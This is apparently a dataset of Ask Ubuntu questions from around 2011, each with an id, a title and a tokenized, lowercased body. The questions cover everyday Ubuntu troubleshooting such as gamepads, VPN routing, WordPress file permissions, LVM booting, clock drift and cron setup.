26772	dragonrise usb gamepad not working	i have a gamepad which is not working , i say `` not working '' because i was playing urban terror and the game was not responding to the gamepad button presses . how do i get the gamepad to work ? i tried it in some other games torcs , supertuxkark , enemy territory ... . but , same , there is no response to any of the gamepad button presses . here is the output of lsusb bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 003 : id 0079:0011 dragonrise inc . bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub 003 on third line is my gamepad . and here is the output from dmesg : http : //paste.ubuntu.com/579704
26775	access mounted volumes via the command line	i 've plugged an external hdd into my usb port , and it shows up on the desktop and in nautilus . how can i access this mounted hdd via the command line ?
26779	the best way to hide my computer on a network	what is the best way on ubuntu to hide my computer from network monitoring tools ( network sniffer ) ?
26782	where are chromium extensions located ?	where are extensions stored once they 've been installed to chromium ?
26793	enforce vpn connection to access the internet	i 'm using a vpn when i 'm online at an unencrypted wifi . unfortunately , at my university the connection is quite unstable and at every reconnect the vpn connection is terminated and i manually need to reconnect to it using the networkmanager , which obviously only works if i notice the reconnect . i enabled the option to automatically connect to the vpn in the nm options , but it seems to have no effect . is there a way to enforce an active vpn connection before any other application can access the network connection so i can be sure not to send private data over unencrypted connections ? cheers , pascal
26796	how to embed evince in firefox 4 ?	i installed mozplugger and created the file mozpluggerrc with the following content according to this post but when i open a .pdf it opens in a separate evince window . is there a way i can truly embed it in firefox like the chrome pdf reader ? application/pdf : pdf : pdf file application/x-pdf : pdf : pdf file text/pdf : pdf : pdf file text/x-pdf : pdf : pdf file application/x-postscript : ps : postscript file application/postscript : ps : postscript file application/x-dvi : dvi : dvi file : evince $ file
26798	is it possible to search through http : //irclogs.ubuntu.com ?	is there a web front-end for http : //irclogs.ubuntu.com that allows me to search through all the irc chat logs ? i tried to google for site : irclogs.ubuntu.com +search-term but that does n't seem to work reliably . i 'm not looking for a solution that fetches any of those files . : - )
26802	sound problem due to wrong driver installation	first of all , the audio used to play from the speaker but whenever i connected a headphone or speaker in the i , the sound did n't came . so i installed a realtek sound driver to fix this ( actually i did n't find any relevant driver for my sound card so i installed it hoping it would show some light ) when i rebooted the system , my sound is completely gone and now ubuntu does not detect any sound devices in my system . i clearly installed wrong driver , now i need to remove and go to previous stage and find a correct driver . i downloaded the latest package from realtek website , extracted the tar.gz file and ran the install file inside the extracted directory from the terminal using command sudo ./install my laptop is : dell studio 1747 , uses a speaker creative labs sound x-fi mb sound blaster and the chipset is intel pm55 . how can i fix this ?
26803	change default application for a file type	i have installed ms office 2007 via wine , which all works remarkably well . however , ms office has now laid claim to any 'office ' files on my computer . is there a way to change the default application for a file type ?
26804	microsoft office incorrectly claims non office files	ive installed microsoft office via wine . office now believes that some non-office files ( my .pub public key file for example ) are office files . this understandable , i know .pub is the is the file type for microsoft publisher files . in the case of my public key i can easily remove the file ending without any problems , but is this issue likely to cause problems anywhere else on my system ?
26814	display io statistics for a process	is there a way to view io stats based on process in ubuntu . i have an ubuntu server 10.10 that every once and while will grind on the hdd 's for 30 seconds , i 'm trying to figure out what is causing that . thanks in advance . all i 'm running on it is mysql however it happens even when mysql is not under any load ( no connections just idle ) .
26817	asks me to login when i run from cd	i just downloaded the iso for ubuntu 10.10 and burned it to cd . when i click try ubuntu , it starts up and then asks for login info . i could n't find anything on the website ( though i did n't search very hard ) . does anyone know what it is . edit : if i must ask the obvious question , then what is the username and password ?
26818	how to make bash script run with a latency ( i.e . wait 1 sec at each iterations ) ?	i have this bash script ; for ( ( i = 1 ; i < = 160 ; i++ ) ) ; do qsub myccomputations '' $ { i } '' .pbs done basically , i would prefer if there was a 1 second delay between each iteration . the reason is that at each iterations , it sends the program file mycomputation '' $ { i } $ .pbs to a core node for solving . the mootivation is that solving in this instance involves the use of pseudo random numbers and the rng i use ( r 's ) uses cpu time as seed . so how to you ask bash to for ( ( i = 1 ; i < = 160 ; i++ ) ) ; do wait 1 sec qsub myccomputations '' $ { i } '' .pbs done
26825	item type in menu of applications : `` application '' or `` application in terminal '' ?	i was wondering what is the difference between the two item type in menu of applications : `` application '' and `` application in terminal '' ? what kinds of applications are specified as `` application '' and what kinds for `` application in terminal '' ? this question is motivated from my previous one . thanks !
26829	how come i can not install plugins on my local wordpress install ?	i got wordpress up and running fine on ubuntu 10.04 by using this source except that when i try to update and install themes/plugins i get this following error message in wp-admin page : installing plugin : wordpress.com stats 1.8.1 downloading install package from http : //downloads.wordpress.org/plugin/stats.1.8.1.zipâś unpacking the packageâś could not create directory . /var/www/wordpress/wp-content/upgrade/stats.tmp/stats actions : return to plugin installer at first i thought i had to setup an ftp account but searched more and i found some information that says that i need to change the permissions of the wp-content folder which is located in the directory : /var/www/wordpress/wp-content i tried changing it by doing : sudo chmod -r 777 wp-content/ but when i tried installing a plugin i got the same error message . i also tried passing it 755 as a permission but still got the same thing . i settled on 755 because it is more secure i have read . how can i solve this problem safely and securely ?
26831	is there a way to print notes from tomboy ?	is there a way to print out my tomboy notes ?
26835	compiz shortcut with two arrow keys	the `` put '' functionality of compizconfig settings manager is great . i 'd like to be able to move windows to the desktop corners by using super+down/up+left/right for this ; is that possible ? whenever i try to set something like that it is just reset to `` disabled '' . a workaround is of course to use the numeric pad , but i 'd like to be able to do this on my eee laptop as well without enabling and disabling numlock all the time .
26839	how to get freewins plugin working in compiz ?	how do i get the newest version of freewins compiz plugin working ? it comes in a folder , but it has no makefile ? i am trying to get a nice multitouch compiz working , and to do so , i need this plugin .
26840	wine : wininet.dll sends request for any domain to 127.0.0.1	thanks to @ taylor and @ olli i fully revised my question . hi , i 'm developing a windows application in ubuntu . everything is fine . the only problem is that every web call i perform with wininet.dll is sent to localhost instead of target server . i have no idea what 's the problem and how to force wininet.dll to resolve domain name correctly . i also created the hosts file in ~/.wine/drive_c/windows/system32/drivers/etc/hosts and set domains and ips manually ; but did not help . any idea ?
26842	alternate iso image for current unstable ( alpha/beta ) releases	i 'm looking for minimal/alternate iso image files of current unstable releases . where can i find them ? furthermore , are the core packages in the command line installs stable enough for daily use ?
26848	permissions issue : how can apache access files in my home directory ?	i know file permissions have been covered on here before , but im struggling to get my head around the concept for my scenario . i created the files on an old ubuntu installation . ive copied the files into my new ubuntu installation and put them in my webroot . when i attempt to run the files ( theyre php files ) i get an error relating to permissions in an attempt to fix this , i assumed that they must still be owned by the previous owner , so i ran chown -r on the directory , with my username as an argument , in order to take ownership of all of the files in the directory . it should be noted that the usernames between new and old ubuntu installations were the same . when i attempt to run the files again , same problem : 500 error due to permissions problems . can anyone tell me what other steps i should take ? the webroot for my apache installation is inside my home folder . if i create new files in my webroot , they also work as expected , its only the old files that are causing the problem .
26849	what are the ( possible ) future plans for ubuntu-izing 3rd party software ( please read details ) ?	i know the title is confusing , because honestly it is hard to find the correct title . what i am asking is basically , in light of unity , ubuntu-one and other such projects , is canonical/the ubuntu development team ( correct me about the proper title : p ) planning on more original software ? for instance , ubuntu is quickly becoming a strong ecosystem of it 's own , but has to rely on a lot 3rd party software in various areas , which is fine ( i love that ) , but sometimes this software has major shortcomings that ubuntu inherits . programs like skype , ( sorry i can find any other off hand examples ) miss out in major areas , such as proper desktop integration . if ubuntu has it 's own client side software , then it could be better integrated and more appealing . another example is backup . ubuntu one is great for that , and getting better , but for example , deja dup is not installed be default , and even if it was , misses some integration features on ubuntu ( and will in the future as the ecosystem becomes more unique ) . this could be used as the basis for built in backup software of course , just with better integration with ubuntu . in a nutshell then , is there some kind of roadmap/blueprint governing the direction ubuntu will take in the future regarding such software ? how is canonical planning to engage the community in the process of developing ubuntu 's wider software identity ? ( sorry if my question seems confusing/like_a_rant/mixed_up )
26851	should i install 64-bit ubuntu if my hardware supports it ?	i 've just got my first 64-bit-capable laptop ( previously i 've only dealt with 64-bit on servers ) . of course the first thing i am going to do is to format the hard drive and install ubuntu instead of vista , and the question is should i install 32-bit or 64-bit ubuntu ? here are the details which can matter : cpu : core 2 duo 2 ghz , ram : 3.45 gb . i am going to intensively use multitasking , virtualization ( virtualbox ) and run memory-heavy java , c # and native applications . i ask because my experience shows that 32-bit desktop systems usually work faster and consume less memory . and as far as i know ( have read somewhere , never tried myself ) 64-bit java is known to be extremely ram-wasting compared to 32-bit jre .
26865	how do i set thunderbird to open links in opera ?	because it 's almost obvious that either thunderbird or firefox freeze my whole system after some time , i 'd like to not use ff at the moment and let thunderbird run only for a short time as long as i check e-mails . thunderbird web links should be opened with opera from now . for that i went in thunderbird to preferences- > advanced- > general- > config editor and set the following : network.protocol-handler.app.http - > /usr/bin/opera network.protocol-handler.app.https - > /usr/bin/opera network.protocol-handler.warn-external.ftp - > true network.protocol-handler.warn-external.http - > true network.protocol-handler.warn-external.https - > true moreover i changed in gnome in system- > preferences- > preferred applications opera as web browser and i checked in ff that it should warn if ff is not the default browser ( obviously it is n't anymore ) . unfortunately all of these settings does n't work . thunderbird still opens web links with ff . any explanations why ? ( i already restarted thunderbird although i do n't have to , but no effect )
26868	will 3d games run in a virtualbox4-hosted windows system under ubuntu with intel gma x4500hd card ?	i 've just got a laptop with intel gma x4500hd card ( which is said to be directx10-compliant , while my previous laptop had intel 82852/855gm and no chance to play modern 3d games at all ) . it would be nice if i could play some games ( like halflife 2 , starcraft 2 , fallout 3 ) from time to time ( while i am ok using lo-fi settings and having low performance ) but as i strongly prefer ubuntu environment and do n't need windows usually i 'd like to install windows inside virtualbox instead of using a dedicated partition and dual-boot . so the question is if virtualbox can use 3d acceleration of intel gma x4500hd if run on ubuntu .
26870	exempt programs from using active vpn connection	when i connect to a vpn , all my network traffic is automatically routed through it . is there a way to add exemptions to that ? i do n't know if adding exceptions has anything to do with the vpn protocol , but the vpn i 'm using is of the openvpn protocol . speaking of openvpn , why is it not installed by default on ubuntu installs unlike pptp ? i could not get the list of irchighway 's servers , and this is the result i get trying to connect on xchat with running the bash script running : * looking up irc.irchighway.net * connecting to irc.irchighway.net ( 65.23.153.98 ) port 6667 ... * connected . now logging in ... * you have been k-lined . * *** you are not welcome on this network . * *** k-lined for open proxies are not allowed . ( 2011/02/26 01.21 ) * *** your ip is 173.0.14.9 * *** for assistance , please email banned @ irchighway.net and include everything shown here . * closing link : 0.0.0.0 ( open proxies are not allowed . ( 2011/02/26 01.21 ) ) * disconnected ( remote host closed socket ) . the ip 173.0.14.9 is the one due to my vpn . i had forgotten to check ip route list before running the script , and this is the one after running it : ~ $ ip route list 99.192.193.241 dev ppp0 proto kernel scope link src 173.0.14.9 173.0.14.2 via 192.168.1.1 dev eth1 proto static 173.0.14.2 via 192.168.1.1 dev eth1 src 192.168.1.3 192.168.1.0/24 dev eth1 proto kernel scope link src 192.168.1.3 metric 2 169.254.0.0/16 dev eth1 scope link metric 1000 default dev ppp0 proto static oh and running the script returned this output : ~ $ sudo bash irc_route.sh usage : inet_route [ -vf ] del { -host|-net } target [ /prefix ] [ gw gw ] [ metric m ] [ [ dev ] if ] inet_route [ -vf ] add { -host|-net } target [ /prefix ] [ gw gw ] [ metric m ] [ netmask n ] [ mss mss ] [ window w ] [ irtt i ] [ mod ] [ dyn ] [ reinstate ] [ [ dev ] if ] inet_route [ -vf ] add { -host|-net } target [ /prefix ] [ metric m ] reject inet_route [ -fc ] flush not supported i ran the script after connecting to the vpn .
26873	how can i find out which cards are supported by the nouveau driver ?	i 'm looking at different nvidia cards and would like to know which are supported by the nouveau driver - is there a list of these available and the levels of support offered ?
26874	time server not being used	i have 4 pcs running 10.10 and they all are configured with the same time servers . however , one of them was 6 minutes wrong and it obviously was n't getting its time synchronized via the defined servers . i tried changing a few of those , but nothing short of a reboot would get its clock set properly . any ideas what the problem may be ?
26878	how to programatically sign into a hotspot-type network ?	i often connect to a network , that is open , but requires a key-pass authentication before used in a webpage . is it possible to automate the authentication with a script ?
26880	ubuntu one windows beta : how can i set the synchronized folders ?	ubuntu one on windows beta , how can i set the synchronized folders ?
26884	blank blue screen after trying to fix plymouth logo	i have ati graphics on my machine . i was trying to fix plymouth logo which was bad looking because of my graphics by following an article on softpedia . now i can not login , because i have a blank blue screen . the drivers had installed flawlessly , once they were detected .
26886	fixing unbootable installation on lvm root from desktop livecd	i just did an installation from the 10.10 desktop livecd , making the root volume an lvm lv . apparently this is not supported ; i managed it by taking these steps before starting the gui installer app : installing the lvm2 package on the running system creating an lvm-type partition on the system hard drive creating a physical volume , a volume group and a root lv using the lvm tools . i also created a second lv for /var ; this i do n't think is relevant . creating a filesystem ( ext4 ) on each of the two lvs . after taking these steps , the gui installer offered the two lvs as installation targets ; i gladly accepted , also putting /boot on a primary partition separate from the lvm partition . installation seemed to go smoothly , and i 've verified that both the root and var volumes do contain acceptable-looking directory structures . however , booting fails ; if i understood correctly what happened , i was dropped into a busybox running in the initrd filesystem . although i have n't worked through the entirety of the grub2 docs yet , it looks like the entry that tries to boot my new system is correct : menuentry 'ubuntu , with linux 2.6.35-22-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos3 ) ' search -- no-floppy -- fs-uuid -- set $ uuid_of_boot_filesystem linux /vmlinuz-2.6.35-22-generic root=/dev/mapper/ $ lvm_volume_group-root ro quiet splash initrd /initrd.img-2.6.35-22-generic } note that $ vars are replaced in the actual grub.cfg with their corresponding values . i rebooted back into the livecd and have unpacked the initrd image into a temp directory . it looks like the initrd image lacks lvm functionality . for example , if i 'm reading /usr/share/initramfs-tools/hooks/lvm2 ( installed with lvm2 on the livecd-booted system , not present on the installed one ) correctly , an lvm executable should be situated in /sbin ; that is not the case . what 's the best way to remedy this situation ? i realize that it would be easier to just use the alternate install cd , which apparently supports lvm , but i do n't want to wait for it to download and then have to reinstall .
26887	find minimal equivalent of packages currently installed	i have used a tool that calculates the minimal set of packages you can install to get the current set of packages you have . this is different than telling you what your selections are . it literally finds the shortest list of packages that will , through dependencies , give you what you currently have . i forgot where to find this tool . what is it called ?
26889	how to find and back up only files not part of a package	how can i find a list of every file that is modified or added outside the debian package management system ? cruft is unmaintained and does n't know about the way today 's debian package management tools , etc work . for instance , it misses postinst created files and logs that are actually listed as handled by a package and have not been modified since installation date/time .
26891	is error recovery control or tler necessary for software raid5 using lvm	i ave been told that for raid configurations you do n't what to use standard desktop drives because they when/if they enter a error recovery mode they might time out and get dropped from the raid . is this true for lvm software raid or this this a hardware raid issue primarily ? . we are running this server primarily as a backup server and would like to take advantage of the lower price of the desktop drives .
26892	clock drift even though ntpd running	i 'm having a problem with the clock drifting on my pc . i 'm running ubuntu 10.10 on an somewhat crusty ibm e-server ( 1.5gb ram , 2.4ghz cpu ) ntpd is running ( started at run level 2 ) servers are defined : server 1.us.pool.ntp.org server 2.us.pool.ntp.org server 3.us.pool.ntp.org server time.nrc.ca server ntp1.cmc.ec.gc.ca server ntp2.cmc.ec.gc.ca server wuarchive.wustl.edu server clock.psu.edu looking at the log file , it would seem that the ntp daemon is running , but the system clock never seems to be set , however . if i manually set the time from a casio `` atomic '' watch , the date/time displayed by the clock applet drifts out of sync over time . looking at the log file ( below ) it would seem the ntp daemon started ok and is running . so i am totally flummoxed right now : - ( here 's a copy of my ntp.log file .
26894	how can i remove ubuntu from my dual-boot and replace it with another distribution ?	in windows xp , i right click on my computer , select manage â disk management , right click on the ubuntu partition and choose delete logical drive . can i remove ubuntu like this ? if not please suggest a way . note : i want to remove ubuntu 10.10 and setup suse 11.3 instead .
26896	how can i get my iogear gcs632u kvm switch to work ?	i bought a kvm switch and i 'm trying to use it to have it connected to my main pc ( win7 ) and my new machine i just installed ubuntu on . i hooked it up properly , and tried using it . it worked when switching from the win7 machine to the ubuntu one , but after the ( 1st and only ) successful switch , ubuntu just did n't seem to recognize my mouse or keyboard . basically when i tried it the easiest was to explain what happened was it only worked with win7 . when i switched over to ubuntu by doing a [ scroll-lock ] [ scroll-lock ] , my keyboard and mouse were not recognized . however , the lights on the keyboard and mouse did work when on ubuntu , but they did n't function , and since keyboard would n't function , i could n't do a [ scroll-lock ] [ scroll-lock ] to switch back to the win7 machine . so i was basically locked in to ubuntu with no mouse or keyboard , and i had to unplug the keyboard/mouse usb 's and d-sub to plug the monitor d-sub back into win7 computer to type up this thread and google the issue . seems some people have had this issue before but i could n't find a fix ... i am 80 % sure it has to do with drivers ... but there is n't any for kvm switches , at least not this one also i never was unable to find ubuntu drivers/firmware for my mouse and keyboard ( logitech g15 and razer deathadder 3500 ) . i do n't know how to fix this , perhaps someone super-savvy could write/code a script or work-around or something ? i really need to get this thing working , my back is getting sore from bending over and plugging in / unplugging usb/monitor/usb/monitor/usb/usb over and over again lol ... and i really would be sad if the constant plugging unplugging of the usb 's or the d-sub port would over time damage the ports ... i do n't want that ... there has to be some way to get this working ... can anyone help ? the kvm is an iogear gcs632u win7 x64 ubuntu 10.10
26902	make gdm accessible only remotely via xdmcp , while console remains in text mode	i have a 10.04 server and i have installed gnome-desktop on it so that i can do some of work in a nicer way . i connect to gdm remotely via xdmcp ( hummingbird exceed ) but at the same time i want the console to remain in text mode . is there a way to do this ? thanks !
26906	exclude folders from being scanned by shotwell	i have a phone ( an htc hero ) and when i plug it into my computer , shotwell shows me my photos and some other files that are on some applications folders that i do n't want to import . everytime i unselect these photos , but a better solution would be to exclude these folders from being scanned by shotwell . any suggestions on how to do this please ?
26908	how do i make a rich menu for an appindicator ?	i 'm adding menu items to an appindicator in pygtk . i do n't want them to behave like ordinary menu items : i want them to have normal appearance , but not to respond to mouse hovers and mouse clicks . the way i imagine the new sound menu will behave . in other words , i want to prevent the menuitem selection that 's going on below : how do i go about doing that ? what events should i swallow , or is there a better way ?
26909	gnome shell battery icon missing	i am just wondering ... .. why is there no battery icon ? it 's hard to work without any battery status around . i am using maverick , and the gnome3 files came from git .
26910	stick with ipv6 or go back to ipv4 ?	recently i came upon a discussion , saying that for a better network performance you should disable ipv6 and use ipv4 instead.considering that ipv6 is very underdeveloped and more buggy , then its predecessor ipv4.and that most routers ca n't even handle ipv6 yet.should i stick with ipv6 or change back to ipv4 ?
26911	erase and rewrite mp3 id3 tags	background i have a squeezebox , and am running the server on my ( natty ) machine . this server scans my music directory and adds all files found therein to the server 's library , to be streamed over the network to the devices . problem there 's a problem though â not all of my files are recognised due to the server 's tag parser being buggy . i 've filed a bug upstream about this . question to fix this problem , i 'd like to erase and rewrite the id3 tags on my mp3s . ideally i do n't want any of the tags to change . do you know of a program or script which can do this ? somehow iterate over all of my files and save their metadata , then erase it from the file leaving just the audio before writing it back . i 'm trying to avoid writing a script to do this myself ( although i will do if nobody knows a program/can come up with one ) . hopefully this clean rewrite will then be accepted by the server . if not , well , at least we tried .
26912	how can i sync an ipad ?	i am mainly curious about my music and contacts ...
26913	typeset : not found error when executing shell script . am i missing a package or something ?	below is the error and corresponding script lines : spec @ lucifer : ~/documents/seagull.svn.linux $ ./build.ksh ./build.ksh : 36 : typeset : not found ./build.ksh : 39 : typeset : not found ./build.ksh : 44 : function : not found command line syntax of - options -exec < release|debug > : mode used for compilation ( default release ) -target < all|clean|force|dist > : target used for compilation ( default all ) -help : display the command line syntax ./build.ksh : 52 : function : not found error : spec @ lucifer : ~/documents/seagull.svn.linux $ script # init of variables build_target= $ { build_default_target } build_exec= $ { build_default_exec } typeset -u build_os=`uname -s | tr '- ' '_ ' | tr ' . ' '_ ' | tr '/ ' '_ ' ` build_code_directory=code build_directory=`pwd` typeset -u build_arch=`uname -m | tr '- ' '_ ' | tr ' . ' '_ ' | tr '/ ' '_ ' ` build_version_file=build.conf build_dist_mode=0 build_force_mode=0
26916	edit audio : delete a 6+2 channel audio to 2 channel only	so there are a lot of avi files who have 2 audio files embedded . i want to remove the 6 channels and only keep 2 channels because i want it to play on my xbox360 . on windows this task is very easy as there are specific apps for this . does linux ubuntu have these apps ? if not , what can i do to make sure this happens and i get the result i want .
26927	how to disable multiple keyring popups ?	whenever i turn on my computer , i would expect the keyring to ask for my password once . but it asks it 3 different times and for the same default key ring . it really annoys me . how can i stop this from happening ?
26931	upgrading 8.10 server to lts	i 'm in a plan to upgrade ubuntu 8.10 vbox vm servers to lts ( obviously 10.04 ) as 8.10 has no support . as far as i know i 'll be executing the following to upgrade : apt-get install update-manager-core do-release-upgrade anybody could tell me how could i upgrade a ubuntu server from alternate iso image ( is the alternate iso image used for desktop editons the same used for servers ? ) ? i heard it 's possible to upgrade an lts directly to another lts and how could i do this after upgrading 8.10 to 9.04 then directly to 10.04 skipping 9.10 ? 8.10 servers are hosting many services/applications/databases like apache2 , tomcat6 , ldap , mysql , cvs ... and i 'm not sure that all of them work as ever after the upgrade . if there is any precautions that i 've to following before upgrading , please anyone let me know ( ofcourse backup and i 'm not going to take backup as i will be trying this on a copy of vdi/vmdk vms ) thanks !
26932	acer 1551 suspend/hibernate bug ?	i put 64-bit ubuntu 10.10 on my acer 1551 . it does not want to wake from suspend or hibernate . i have tried several different solutions to the apparent problem , but none have worked for me . similar problem : acer aspire 1551 will not wake after suspend i tried what it suggested , no go . also , i think it is taking my acer a while to boot-up what can i look into that may be causing it ? i am new to ubuntu , and would like some help ! thanks
26947	boot error for custom compiled kernel - gave up waiting for root device	i have installed lucid on my lenevo laptop ( y 410 series , x86 platform ) and it is working fine . now i have compiled kernel 2.6.37 downloaded from the kernel tree . i followed usual procedure of compiling kernel ( make menuconfig , make , make modules etc ) . then i created the initrd image using mkinitramfs and updated my grub using update-grub command . update-grub detects the initrd image of the compiled kernel . however when i boot from this kernel it gives me following error : gave up waiting for root device . common problems : - boot args ( cat /proc/cmdline ) - check rootdelay= ( did the system wait long enough ? ) - check root= ( did the system wait for the right device ? ) - missing modules ( cat /proc/modules ; ls /dev ) alert ! root=uuid=/ ... does not exist . dropping to a shell ! busybox v1.19.3 ( ubuntu 1:1.10.3-7ubuntu1.1 ) built-in shell ( ash ) enter 'help ' for a lost of built-in commands . ( initramfs ) and then it falls onto initramfs prompt . i have tried following solutions discussed in different ubuntu forums : disable uuid and point root=/dev/sda8 ( sda8 is where my kernel image resides ( both default kernel and compiled one ) from /etc/default/grub compile kernel using config_devtmpfs=y suggested here still i am unable to boot from the compile kernel . could someone please suggest me the solution ?
26953	is it already possible to enable compiz on an i5 thinkpad laptop ?	besides a number of other issues , i still can not enable compiz or any effects with maverick on a thinkpad x201 . i understand this laptop is supported by ubuntu , yet i have found a good number of posts reporting problems . i would like to know if they have been solved by now . processor : 4x intel ( r ) core ( tm ) i5 cpu m 540 @ 2.53ghz intel corporation core processor integrated graphics controller ( rev 02 ) opengl renderer mesa dri intel ( r ) ironlake mobile gem 20100330 development 2.6.35-27-generic # 47-ubuntu smp here are further details on some of the failures after another clean install : [ ... ] intel ips 0000:00:1f.6 : failed to get i915 symbols , graphics turbo disabled [ ... ] pulseaudio [ 1550 ] : module.c : failed to load module `` module-alsa-card '' ( argument : `` device_id= '' 29 '' name= '' platform-thinkpad_acpi '' card_name= '' alsa_card.platform-thinkpad_acpi '' tsched=yes ignore_db=no card_properties= '' module-udev-detect.discovered=1 '' '' ) : initialization failed . [ ... ] gdm-session-worker [ 1542 ] : glib-gobject-critical : g_value_get_boolean : assertion `g_value_holds_boolean ( value ) ' failed [ ... ] no agp bridge found [ ... ] networkmanager [ 1089 ] : supplicant_interface_acquire : assertion `mgr_state == nm_supplicant_manager_state_idle ' failed [ ... ] 1.065116 ] pm : resume from disk failed .
26954	what good cad programs are available ?	just that . by good i mean something at the level of solidworks , autocad , or similar . this is a complete limitation for me ( and many others ) to use ubuntu .
26957	why do configuration folders have *.d in their name	why do most of the folders in /etc/* end with *.d i am just curious to know , why folders would have this ( extension ? ) .
26968	security of keyctl	today i set up an ecryptfs directory , which is automatically mounted at login via pam . to do so i followed the guide in the ecryptfs readme ecryptfs-readme to sum up , i now have a key stored in the usser session keyring . the first thing i do not understand is why this key is only showing up via keyctl show and not with the gnome-gui `` passwords and encryption keys '' . the second thing i am curious about is the security . i assume that my passphrase is somehow stored on the harddisk . but how exactly and how secure is this ? thanks in advance
26969	where to start studying for developing ubuntu ?	hi am computer science student currently in college and very interested in developing open source software especially ubuntu.is there a one stop go-to place for reading about developing ubuntu . for example i scoured through the official tutorial and documentation of python and i was good to go.i could write useful applications . is there any equivalent for ubuntu or unity ? i tried downloading the alpha 2 , put kept crashing every 5 minute . i was told in irc , it was due to some xorg stack change . now i cant even look at new unity , let alone help develop it . any help or guidance appreciated .
26979	what is the target of unity ?	first unity was developed for netbooks . but the netbook market is shrinking . unity is not specialized for tablet pcs like android 3 , but it may work well with some specialized apps for those devices . unity is still nice for notebooks with small displays , but there is no big advantage on the desktop compared with other desktop environments like gnome 2/3 or kde . so what 's the point ? my first suggenstion was a hybrid between tablet pc and a desktop , for example for a manager . he can plug the tablet in a docking station in his office and he can work at a normal desktop , whats not possible with ios or android . if he is in a meeting he can use it as a tablet to make notes , for example . or if he is somewhere else outside the office or the company . same for normal users . they can dock the tablet and use it like a normal desktop pc or they can lie on the couch and browse in the web , read a book or chat with friend . so , thats my suggestion . but what is the real plan for unity or ubuntu in general ? i 'm curious ; )
26980	is it better to have a separate partition for /boot ?	well , the question title says it all . are there any benefits of creating a separate directory for /boot . is there any kind of grub/any-other-bootloader crash that can corrupt the partition it is installed on ? or any dual-boot scenarios where having separate /boot partition can save me ?
26983	how do i get a line6 ux1 soundcard to work ?	i own a line6 ux1 soundcard and i would like to make it work for ubuntu . i have followed the instructions here and it worked . but at some point i upgraded my kernel version ( not sure what uname -a prints but it 's related ) and it stopped working . here 's what uname -a prints : linux ubuntu 2.6.32-29-generic # 58-ubuntu smp fri feb 11 20:52:10 utc 2011 x86_64 gnu/linux i figured out that maybe it 's installed per version so i used svn update and hit make again . my guess was right as it copied the relevant files to the new version 's folder . i restarted and still nothing . should i revert to an older version ? or is there a solution here ?
26984	how can i set up the lyxserver	i 'm attempting to use the lyz plugin for zotero and lyx and it requires the lyx server to be present . i 've looked on the lyx wiki for information and it makes reference to .lyxpipe.in and .lyxpipe.out but these are not present when i install lyx from the ubuntu repository . what are these files and how can they be created ?
26985	what is a safe ulimit ceiling ?	this is the output of ulimit -a core file size ( blocks , -c ) 0 data seg size ( kbytes , -d ) unlimited scheduling priority ( -e ) 0 file size ( blocks , -f ) unlimited pending signals ( -i ) 16382 max locked memory ( kbytes , -l ) 64 max memory size ( kbytes , -m ) unlimited open files ( -n ) 1024 pipe size ( 512 bytes , -p ) 8 posix message queues ( bytes , -q ) 819200 real-time priority ( -r ) 0 stack size ( kbytes , -s ) 8192 cpu time ( seconds , -t ) unlimited max user processes ( -u ) unlimited virtual memory ( kbytes , -v ) unlimited file locks ( -x ) unlimited this is a 64bit install , and i would like to increase the max-open files from 1024 to a more heady limit such as 5000 . will that be any problem ? will it cause instability ? thanks .
26992	ca n't find windows after installing ubuntu	i know questions like this have been asked before , but this is a bit different . i told it to install ubuntu on the partition that had windows on it . after that , i could n't start windows anymore . can anyone help me ?
26999	how do i get started with translations ?	my friend and i would like to translate ubuntu . where should we start ? where to find translation tools ?
27005	.mov file , video not playing just audio	i have seen this problem posted on this website before but it did n't help solving my problem . i have a .mov file that i am trying to run using vlc and totem movie player . when i try running it with vlc i get audio but no video , and when i try running it using totem i get the following error message : internal gstreamer error : negotiation problem . please file a bug at http : //bugzilla.gnome.org/enter_bug.cgi ? product=gstreamer . when i go to the properties in totem movie player it mention that the video codec for my video is sorensen video v.3 .
27012	adding my own pattern rules to gmake 's `` catalog of implicit rules ''	on maverick ... $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 10.10 release : 10.10 codename : maverick ... using make 3.81 ... $ make -version gnu make 3.81 copyright ( c ) 2006 free software foundation , inc . this is free software ; see the source for copying conditions . there is no warranty ; not even for merchantability or fitness for a particular purpose . this program built for i686-pc-linux-gnu ... can i add my own pattern rules to some default location so those pattern rules are available to all make files without modifying the makefile ( such as adding 'include foo.mk ' ) or modifying the environment variable 'makefiles ' or adding a -f foo.mk to the invocation ? it seems like the catalog is hard-coded and fixed . that defies my intuition about a catalog . thanks .
27014	doing an ssh-add upon ssh/slogin if key is not in ssh-agent ?	when i 'm running gnome , ssh-agent will run ssh-add upon slogin/ssh if the identity is not loaded . i want to mimic this behavior on remote shells , but everything i find suggests to run ssh-add upon login . i only want to run ssh-add if i subsequently run slogin/ssh on the remote shell , not every time i login .
27016	how to make a python script run in anacron	i have a python script that i would like to run daily using anacron , but i have n't been able to get it to work . the script is in my home directory , and i have put a symlink to it in /etc/cron.daily/ . i saw somewhere that things here ca n't have dots in the filename , so the symlink has the .py extension removed ( the original file still has it ) . the python file does have # ! /usr/bin/python on the first line . this is my first experience with cron / anacron , and so i 'm sure i 'm making a dumb mistake - i just do n't know what it is . is a symlink a problem ? do i need the actual file there ? is the python script the problem ? do i need to run a bash script that will open the python script ? is there something else i 'm not thinking of ?
27018	can i present a powerpoint presentation with sound ?	it is possible to demonstrate .ppt with audio under ubuntu ? example such of .ppt - it is short tales for kids
